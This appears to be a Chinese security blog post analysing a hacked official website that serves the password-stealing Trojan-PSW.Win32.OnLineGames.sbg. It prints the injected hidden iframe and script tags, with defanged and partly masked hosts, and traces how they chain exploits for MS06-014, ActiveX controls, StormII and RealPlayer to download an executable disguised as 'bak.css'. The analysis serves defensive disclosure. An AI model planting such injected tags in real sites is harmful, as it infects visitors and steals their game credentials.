某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

简介: 某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

.网站首页包含代码:

/---
<iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0></iframe>
---/

1.1 hxxp://pop**.i**ms**e*e*.cc/g3.htm 包含代码:

/---
<iframe src=news.html width=100 height=0></iframe>
---/

1.1.1 hxxp://pop**.i**ms**e*e*.cc/news.html 输出代码:

/---
<script src=hxxp://x**x*x.c**ka**bc*.net/ms06014.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html"></iframe>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/StormII.html"></iframe>
<sCrIpT LAnGuAgE="jAvAsCrIpT" src=hxxp://x**x*x.c**ka**bc*.net/real.js></script>
<iframe style=display:none src="hxxp://x**x*x.c**ka**bc*.net/Thunder.html"></iframe>
---/

1.1.1.1 hxxp://x**x*x.c**ka**bc*.net/ms06014.js

利用 MS06-014漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

bak.css其实是一个PE格式的可执行文件

1.1.1.2 hxxp://x**x*x.c**ka**bc*.net/GLWORLD.html

利用 联众世界的游戏大厅主程序GLWorld所安装的ActiveX控件(HanGamePluginCn18.dll,CLSID:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

1.1.1.3 hxxp://x**x*x.c**ka**bc*.net/StormII.html

利用 暴风影音2 组件mps.dll(clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB)漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

1.1.1.4 hxxp://x**x*x.c**ka**bc*.net/real.js

利用 RealPlayer 漏洞下载 hxxp://user**1*.1**a2b**3c*0.net/bak.css

1.1.1.5 hxxp://x**x*x.c**ka**bc*.net/Thunder.html

内容空白

1.1.1.6 利用 BaiduBar.Tool 下载 hxxp://x**x*x.c**ka**bc*.net/Baidu.cab

Baidu.cab 中的 Baidu.exe 与 bak.css相同。  


相关文章
|
2月前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
|
2月前
|
数据安全/隐私保护
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
|
2月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
|
2月前
|
监控 安全 数据安全/隐私保护
遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
遭遇Trojan-PSW.Win32.WOW,Trojan.PSW.Win32.OnlineGames,Trojan.MnLess.kks等1
|
2月前
|
安全 Shell
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
|
2月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
|
2月前
|
安全
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等1
|
2月前
|
安全 Windows
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2
遭遇RootKit.Win32.GameHack.GEN,Trojan.PSW.Win32.GameOL.GEN,RootKit.Win32.Mnless等2
|
2月前
|
安全
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1